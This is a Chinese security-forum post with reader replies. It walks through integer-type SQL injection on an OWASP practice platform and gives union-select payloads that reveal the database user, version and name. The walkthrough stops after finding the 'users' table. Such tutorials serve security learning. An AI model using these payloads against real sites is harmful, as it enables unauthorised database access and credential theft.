首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[原创]SQL注入获取用户名密码过程-integer型注入
发表于: 2019-8-7 15:47 7470

[原创]SQL注入获取用户名密码过程-integer型注入

CCMts 活跃值
2019-8-7 15:47
7470

这个也是OWASP放出来的一个web安全学习平台,PHP+MySQL,主要有SQL注入练习及简单绕过

地址:bf2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8R3`.`.

1、找测试注入点

edeK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`.

2、测试加 ' 号,页面返回错误(可能存在注入点)

3、确认是否存在注入点

18fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=1 页面返回正常

026K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=2 页面返回错误

证明存在注入点

4、查询当前表有多少列,用order by测试,切换数字,直到不出错为止,测试结果为

947K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`.  order by 8

5、测试哪列数据有回显(1,2,3列都可以显示)

0f1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=2 union select 1,2,3,4,5,6,7,8

5、查询数据库相关信息

查询当前用户权限 f77K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=2 union select 1,user(),3,4,5,6,7,8

查询当前数据库版本 bc4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=2 union select 1,version(),3,4,5,6,7,8

注:这里根据数据库版本可以选择应对策略

查询当前数据库名称  ed6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6i4K6u0W2x3U0b7%4i4K6u0W2z5e0q4Q4x3X3f1J5x3U0S2Q4x3@1p5^5x3#2)9J5c8X3y4G2L8Y4c8W2L8Y4c8Q4x3X3b7I4i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6l9`. and 1=2 union select 1,database(),3,4,5,6,7,8

6、查询inject数据库里的表名(将表名'inject'进行ANSI编码结果为%27%69%6E%6A%65%63%74%27)测试结果表名为users


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2019-8-7 15:51 被CCMts编辑 ,原因: 补充说明
收藏
免费 0
支持
分享
最新回复 (11)
JaySe
雪    币: 1122
活跃值: (518)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
不错不错 很详细  
2019-8-7 16:47
0
niuzuoquan
雪    币: 300
活跃值: (2772)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
mark
2019-8-8 14:18
0
mb_pqzbeuna
雪    币: 219
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
4
大佬,我想学渗透,可以带带我吗?
2019-8-13 17:03
0
MDJerry
雪    币: 219
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
5
2019-8-16 21:22
0
nqxcwl
雪    币: 3935
活跃值: (202)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
sqlmap 直接搞起来~~
2019-8-16 21:33
0
Krypt0n
雪    币: 122
活跃值: (360)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
写的很仔细 
2019-8-21 19:06
0
coolsnake
雪    币: 2359
活跃值: (288)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
非常好的文章
2019-8-24 09:16
0
wasdzjh
雪    币: 1826
活跃值: (657)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
不错的文章,支持一下
2020-10-12 12:58
0
niuzuoquan
雪    币: 300
活跃值: (2772)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
10
mark,感谢分享
2020-10-12 14:26
0
goldli
雪    币: 2132
活跃值: (1866)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
12
先==,
select * from user where idusers=0 and 1=2 union select 1,2,3,4,5,6,7,8
你这里的   0 and 1=2 union select 1,2,3,4,5,6,7,8  为什么会存在 ?
这个是怎么输入进去的 ?
原始的sql是什么样的?

正常情况下,sql语句,查询人员使用登陆名
select Id,LoginPwd, LoginSalt from tb_user where loginName = @loginName
变量 @loginName = 前端传入值
什么时候允许使用 Id 进行传入的 ? 这么敏感的东西不是不允许使用的吗 ?
即使使用了, 那么也该是一个字符串 ,即
select * from user where idusers=“0 and 1=2 union select 1,2,3,4,5,6,7,8”
而不存 select * from user where idusers=0 and 1=2 union select 1,2,3,4,5,6,7,8。
如果能存在, 那么, 你不是直接可以访问数据库了 ?
2022-9-5 09:43
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回